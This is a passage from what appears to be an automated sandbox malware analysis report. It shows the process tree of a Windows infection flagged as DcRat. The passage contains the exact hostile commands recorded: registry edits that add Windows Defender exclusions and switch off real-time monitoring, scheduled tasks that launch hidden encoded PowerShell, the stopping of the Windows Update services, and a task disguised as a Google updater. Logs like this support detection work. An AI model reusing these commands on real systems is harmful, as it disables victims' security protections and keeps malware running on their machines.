  - - C:\Users\Admin\Pictures\kRthp4WSd36dGiVtyCKouTRt.exe
      "C:\Users\Admin\Pictures\kRthp4WSd36dGiVtyCKouTRt.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in Drivers directory
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      PID:2080
  - - C:\Users\Admin\Pictures\S43ND2aHtJ5KT8vGcjscMGOL.exe
      "C:\Users\Admin\Pictures\S43ND2aHtJ5KT8vGcjscMGOL.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2452
  - - C:\Users\Admin\Pictures\rtyMANYqEaQ5m3g0rUIcowCg.exe
      "C:\Users\Admin\Pictures\rtyMANYqEaQ5m3g0rUIcowCg.exe" --silent --allusers=0
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1824
  - - C:\Users\Admin\Pictures\IJmiVlFOgSUbo93PGOTzINSi.exe
      "C:\Users\Admin\Pictures\IJmiVlFOgSUbo93PGOTzINSi.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:1664
    - - C:\Users\Admin\Pictures\IJmiVlFOgSUbo93PGOTzINSi.exe
        
        "C:\Users\Admin\Pictures\IJmiVlFOgSUbo93PGOTzINSi.exe"
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:616
  - - C:\Users\Admin\Pictures\IpIzvfq0LMpxe5StXQJKHf54.exe
      "C:\Users\Admin\Pictures\IpIzvfq0LMpxe5StXQJKHf54.exe"
      4⤵
      PID:1656
  - - C:\Users\Admin\Pictures\G8iuBkKMAryZUTGiwXZGHIym.exe
      "C:\Users\Admin\Pictures\G8iuBkKMAryZUTGiwXZGHIym.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1572
    - - C:\Users\Admin\AppData\Local\Temp\7zS8DAF.tmp\Install.exe
        
        .\Install.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1200
      - C:\Users\Admin\AppData\Local\Temp\7zS8FE1.tmp\Install.exe
        
        .\Install.exe /dcCcdidRiisJ "385118" /S
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Enumerates system info in registry
        
        PID:1068
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:2260
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:2204
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:2748
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:1912
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:2200
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:1456
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gujptvfHf" /SC once /ST 02:27:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        DcRat
        Creates scheduled task(s)
        
        PID:1756
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gujptvfHf"
        7⤵
        
        PID:1176
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gujptvfHf"
        7⤵
        
        PID:1536
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 05:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\nPHESYk.exe\" 3Y /sgsite_iduui 385118 /S" /V1 /F
        7⤵
        DcRat
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:808
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bwpFiyeZPJPVdaMxTt"
        7⤵
        
        PID:868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2364
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1548
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1552
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2468
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2100
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:772
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2524
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2944
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:2092
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2732
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1704
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1160
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2852
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\iacrcjwhmdyc.xml"
  2⤵
  - DcRat
  - Creates scheduled task(s)
  PID:1960
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2960
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1340
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1944
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:640
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1716
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2552
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2956
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1192
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1004
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1072
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1824
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:768
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\iacrcjwhmdyc.xml"
  2⤵
  - DcRat
  - Creates scheduled task(s)
  PID:2532
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:1460
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1620

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231020052443.log C:\Windows\Logs\CBS\CbsPersist_20231020052443.cab
1⤵
- Drops file in Windows directory
PID:2792

C:\Windows\system32\taskeng.exe
taskeng.exe {66431DE0-824A-44F3-B957-EBFC2048C3A1} S-1-5-21-686452656-3203474025-4140627569-1000:UUVOHKNL\Admin:Interactive:[1]
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1656
- C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
  C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
  2⤵
  - Executes dropped EXE
  PID:2700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2856
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2192
- C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
  C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
  2⤵
  - Executes dropped EXE
  PID:2456
- C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
  C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
  2⤵
  - Executes dropped EXE
  PID:392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2076
- C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
  C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
  2⤵
  - Executes dropped EXE
  PID:2568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2468
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  PID:2448
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2092
- C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
  C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
  2⤵
  PID:2380

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:320

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2016

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1716

C:\Windows\system32\taskeng.exe
taskeng.exe {E2B81EB3-DF53-4920-B854-762906D9369F} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2400
- C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\nPHESYk.exe
  C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\nPHESYk.exe 3Y /sgsite_iduui 385118 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:2680
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gyYEwBEQh" /SC once /ST 04:52:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:2720
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gyYEwBEQh"
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gyYEwBEQh"
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:320
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1388
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:2804
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2448
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gWAXysVfL" /SC once /ST 01:16:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:2464
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gWAXysVfL"
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gWAXysVfL"
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2112
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1196
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2096
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2908
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2924
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2092
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2192
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2652
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\wUBDPVxDQVpvNZiy\KpkEnIbe\QhyTEXBxzMAkXxlL.wsf"
    3⤵
    PID:364
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\wUBDPVxDQVpvNZiy\KpkEnIbe\QhyTEXBxzMAkXxlL.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:2180
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2588
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2060
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1960
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:3044
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1072
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2992
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1812
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:392
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:3040
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1708
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:3060
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1732
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2832
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2632
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2376
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1948
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2408
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1932
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2748
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:700
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:868
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:332
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2908
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2972
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1196
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1548
  - - C:\Windows\SysWOW64\reg.exe
